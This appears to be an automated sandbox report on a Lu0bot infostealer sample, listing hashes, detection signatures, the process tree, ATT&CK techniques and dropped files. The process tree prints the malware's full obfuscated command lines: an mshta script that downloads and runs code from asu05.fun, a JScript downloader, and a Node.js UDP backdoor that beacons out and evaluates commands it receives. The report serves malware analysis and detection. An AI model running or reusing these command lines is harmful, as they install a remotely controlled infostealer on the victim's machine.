Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    27-07-2021 21:27

General

  • Target

    eufive_20210727-174641.exe

  • Size

    3KB

  • MD5

    13e7feb9430554945b5aa4f6b5524d66

  • SHA1

    3d644cfe881c9c5e80f94f0173dc3fa3169e145b

  • SHA256

    bf44cfa6534d38b172ea611502230f1978f26a28cb1b510ed1c2cd6bd15f007f

  • SHA512

    271912df0b8a74a9081a1c3457ac4290c19cd88ade2d42a48683d187aea9391c3fa6505154dcfa15358c3ca273c2203548c3d579dad0b4d063fd91d72bf4cc08

Malware Config

Signatures

  • Lu0bot

    Lu0bot is a lightweight infostealer written in NodeJS.

  • suricata: ET MALWARE lu0bot Loader HTTP Request
  • suricata: ET MALWARE lu0bot Loader HTTP Response
  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • NTFS ADS 2 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\eufive_20210727-174641.exe
    "C:\Users\Admin\AppData\Local\Temp\eufive_20210727-174641.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3152
    • C:\Windows\SysWOW64\mshta.exe
      mshta "javascript:document.write();51;y=unescape('%325%33%7E%68t%74p%3A%2F%2Fa%73u%305%2Ef%75n%2Fh%72i%2F%3F%32f%652%652%62%7E%317%39').split('~');205;try{x='WinHttp';82;x=new ActiveXObject(x+'.'+x+'Request.5.1');175;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);222;x.send();105;y='ipt.S';173;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);253;}catch(e){};202;;window.close();"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:576
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /d/s/c cd /d "C:\ProgramData" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);x.Open("GET",unescape(WScript.Arguments(0^)^),false^);x.Send(^);b=new ActiveXObject("ADODB.Stream"^);b.Type=1;b.Open(^);b.Write(x.ResponseBody^);b.SaveToFile(WScript.Arguments(1^),2^); > get1627421298141.txt & cscript /nologo /e:jscript get1627421298141.txt "http%3A%2F%2Fasu05.fun%2Fhri%2F%3F27b9716c2%26b%3Da41b199e" node.cab & expand node.cab node.exe & del get1627421298141.txt node.cab ) & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1627421298141.txt & cscript /nologo /e:jscript get1627421298141.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%277b9716c2%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu05.fun%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))" & del get1627421298141.txt
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2828
        • C:\Windows\SysWOW64\cscript.exe
          cscript /nologo /e:jscript get1627421298141.txt "http%3A%2F%2Fasu05.fun%2Fhri%2F%3F27b9716c2%26b%3Da41b199e" node.cab
          4⤵
          • Blocklisted process makes network request
          PID:4012
        • C:\Windows\SysWOW64\expand.exe
          expand node.cab node.exe
          4⤵
          • Drops file in Windows directory
          PID:2368
        • C:\Windows\SysWOW64\cscript.exe
          cscript /nologo /e:jscript get1627421298141.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%277b9716c2%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu05.fun%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2848
          • C:\ProgramData\DNTException\node.exe
            "C:\ProgramData\DNTException\node.exe" -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%277b9716c2%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu05.fun%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))
            5⤵
            • Executes dropped EXE
            • Checks processor information in registry
            • NTFS ADS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3720
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c dir C:\
              6⤵
                PID:640
              • C:\Windows\SysWOW64\cacls.exe
                cacls.exe C:\ProgramData\DNTException /t /e /c /g Everyone:F
                6⤵
                  PID:2332
                • C:\Windows\SysWOW64\icacls.exe
                  icacls.exe C:\ProgramData\DNTException /t /c /grant *S-1-1-0:(f)
                  6⤵
                  • Modifies file permissions
                  PID:3440
                • C:\Windows\SysWOW64\attrib.exe
                  attrib.exe +H C:\ProgramData\DNTException
                  6⤵
                  • Views/modifies file attributes
                  PID:2372
                • C:\Windows\SysWOW64\attrib.exe
                  attrib.exe +H C:\ProgramData\DNTException\node.exe
                  6⤵
                  • Views/modifies file attributes
                  PID:4068
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist /fo csv /nh
                  6⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4012
                • C:\Windows\SysWOW64\Wbem\wmic.exe
                  wmic process get processid,parentprocessid,name,executablepath /format:csv
                  6⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3120
                • C:\Windows\SysWOW64\ipconfig.exe
                  ipconfig.exe /all
                  6⤵
                  • Gathers network information
                  PID:3604
                • C:\Windows\SysWOW64\route.exe
                  route.exe print
                  6⤵
                    PID:2828
                  • C:\Windows\SysWOW64\netstat.exe
                    netstat.exe -ano
                    6⤵
                    • Gathers network information
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3404
                  • C:\Windows\SysWOW64\systeminfo.exe
                    systeminfo.exe /fo csv
                    6⤵
                    • Gathers system information
                    PID:3376

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Execution

        Command-Line Interface

        1
        T1059

        Persistence

        Hidden Files and Directories

        1
        T1158

        Defense Evasion

        File Permissions Modification

        1
        T1222

        Hidden Files and Directories

        1
        T1158

        Discovery

        System Information Discovery

        4
        T1082

        Query Registry

        1
        T1012

        Process Discovery

        1
        T1057

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\DNTException\get1627421298141.txt
          MD5

          52ec5ebd8a447b5115ce83e703bcde51

          SHA1

          38ce97f87c6be668d07985558fc89c53e27770a3

          SHA256

          ef1be6a77e480e683331052654d3db47a02fe4b7af3e35e67b9248e989307615

          SHA512

          9af71d426564ef92ff6de1d89107161c138bbdd9dc08b5e380a0b94e7b2e91ec4d498a1d8f4514552a45bf14a8f9078dc295aa1cb86cfc063427ad218e9d5f32

        • C:\ProgramData\DNTException\get1627421298141.txt
          MD5

          e15f82747d0884d61a5bc4fb2db7d29d

          SHA1

          aca478622586f17603fe56705fd319b75198b2b0

          SHA256

          982675d0465497986b3ece89f08f81a4629d975617671153e0ca653f2589966f

          SHA512

          d8c17e54cbefa72191c238f23d619a4637fd74c8c8b9975071bf5507c5a34259495cd20e516c7f7f0c215ec4f724b22de88b8a5ea43765c019eb067600cf661d

        • C:\ProgramData\DNTException\node.cab
          MD5

          c7ed3d9304a29c8b472174bd910be071

          SHA1

          22b7d55b80acd434c13b0a2d8c59b45c10220a42

          SHA256

          abbaffb1b56bd3c5db5aedf4bdc0794d82bedba43677d13cd1056cb5412b3441

          SHA512

          c65c80564019ae54145a939f9ed463895c337f020cbd769647dc6baf8db5db283a5e151c2ae4f10681d23db161d791ce59c395d8ebba603a27a2a6be0368a1a2

        • C:\ProgramData\DNTException\node.exe
          MD5

          11f0b4e17e686cdc46f85a6becede4a8

          SHA1

          2826f7ac33b43439ecddd08ad541a7f54a9eb7c0

          SHA256

          6a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c

          SHA512

          11a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f

        • C:\ProgramData\DNTException\node.exe
          MD5

          11f0b4e17e686cdc46f85a6becede4a8

          SHA1

          2826f7ac33b43439ecddd08ad541a7f54a9eb7c0

          SHA256

          6a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c

          SHA512

          11a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f

        • memory/576-114-0x0000000000000000-mapping.dmp
        • memory/640-131-0x0000000000000000-mapping.dmp
        • memory/2332-132-0x0000000000000000-mapping.dmp
        • memory/2368-118-0x0000000000000000-mapping.dmp
        • memory/2372-134-0x0000000000000000-mapping.dmp
        • memory/2828-139-0x0000000000000000-mapping.dmp
        • memory/2828-115-0x0000000000000000-mapping.dmp
        • memory/2848-120-0x0000000000000000-mapping.dmp
        • memory/3120-137-0x0000000000000000-mapping.dmp
        • memory/3376-141-0x0000000000000000-mapping.dmp
        • memory/3404-140-0x0000000000000000-mapping.dmp
        • memory/3440-133-0x0000000000000000-mapping.dmp
        • memory/3604-138-0x0000000000000000-mapping.dmp
        • memory/3720-127-0x0000000015500000-0x0000000015501000-memory.dmp
          Filesize

          4KB

        • memory/3720-130-0x0000000015800000-0x0000000015801000-memory.dmp
          Filesize

          4KB

        • memory/3720-129-0x0000000007500000-0x0000000007501000-memory.dmp
          Filesize

          4KB

        • memory/3720-128-0x000000003EA00000-0x000000003EA01000-memory.dmp
          Filesize

          4KB

        • memory/3720-125-0x000000001E300000-0x000000001E301000-memory.dmp
          Filesize

          4KB

        • memory/3720-126-0x0000000034600000-0x0000000034601000-memory.dmp
          Filesize

          4KB

        • memory/3720-123-0x0000000000000000-mapping.dmp
        • memory/4012-136-0x0000000000000000-mapping.dmp
        • memory/4012-116-0x0000000000000000-mapping.dmp
        • memory/4068-135-0x0000000000000000-mapping.dmp